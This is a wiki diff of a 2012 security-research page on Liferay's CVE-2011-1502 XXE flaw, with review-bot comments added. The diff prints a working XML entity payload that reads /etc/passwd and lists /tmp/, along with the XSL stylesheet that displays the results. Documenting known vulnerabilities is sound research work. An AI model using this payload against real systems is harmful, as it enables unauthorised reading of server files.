Changes for page Application_Liferay

Last modified by Nicolas Gregoire on 2012/04/19 14:05

From version 19.1
edited by Nicolas Gregoire
on 2012/01/13 14:39
Change comment: There is no comment for this version
To version 17.1
edited by Nicolas Gregoire
on 2012/01/13 14:25
Change comment: There is no comment for this version

Summary

Details

Page properties
Content
... ... @@ -24,11 +24,5 @@
24 24  
25 25  * CVE-2011-1502 : allows to read UTF-8 files and to list directories via a XEE (XML External Entity) attack
26 26  
27 -
28 -
29 -
30 -
31 -Reading /etc/passwd using CVE-2011-1502 (cf attached files [[liferay-xee.xsl>>attach:liferay-xee.xsl]] and [[liferay-xee.xml>>attach:liferay-xee.xml]]) :
32 -
33 -
27 +Reading /etc/passwd using CVE-2011-1502 :
34 34  [[image:liferay-read-etc-passwd-via-xee.png||style="display: block; margin-left: auto; margin-right: auto"]]
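Review bot: the added line 27 ("Reading /etc/passwd using CVE-2011-1502 :") no longer links the attachments liferay-xee.xsl and liferay-xee.xml that the removed line 31 pointed to, so the screenshot on line 34 is left without any reference to the inputs that produced it. This comparison runs from version 19.1 to the older 17.1, so check the direction before reading it as a deletion. If the links are kept, the six blank lines around them (27-30, 32-33) can be collapsed to one. The context line 25 would also read better as "allows reading UTF-8 files and listing directories"; the usual abbreviation for XML External Entity is XXE.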
liferay-xee.xml
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -184 bytes
Content
... ... @@ -1,9 +1,0 @@
1 -<!DOCTYPE doc [
2 -<!ENTITY boom1 SYSTEM "/etc/passwd">
3 -<!ENTITY boom2 SYSTEM "/tmp/">
4 -]>
5 -<doc>
6 -<response><file>&boom1;</file></response>
7 -<response><file>&boom2;</file></response>
8 -</doc>
9 -
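Review bot: liferay-xee.xml carries no comment saying what each entity demonstrates. Line 2 points boom1 at a file ("/etc/passwd") and line 3 points boom2 at a directory ("/tmp/"), which matches the two effects the page lists for CVE-2011-1502 (reading files and listing directories), but a reader has to infer that mapping. If the attachment stays on the page, add a one-line note per entity, and state next to it that the result depends on the parser resolving SYSTEM entities declared in an inline DOCTYPE, since that is the behaviour a fix has to turn off.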
liferay-xee.xsl
Author
... ... @@ -1,1 +1,0 @@
1 -xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,1 +1,0 @@
1 -319 bytes
Content
... ... @@ -1,12 +1,0 @@
1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
2 -<xsl:template match="/doc">
3 - <html><body>
4 - <xsl:for-each select="response">
5 - <h2>File content :</h2>
6 - <xsl:value-of select="file"/>
7 - <hr/>
8 - </xsl:for-each>
9 - </body></html>
10 -</xsl:template>
11 -</xsl:stylesheet>
12 -
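Review bot: the heading on line 5 ("File content :") is emitted for every response element, including the one whose entity in liferay-xee.xml targets the directory "/tmp/", so the second block of the rendered page is labelled as a file when it is a directory listing. If the stylesheet is kept, use a neutral heading or one that names the entity being shown, so the screenshot on the page can be read without opening both attachments.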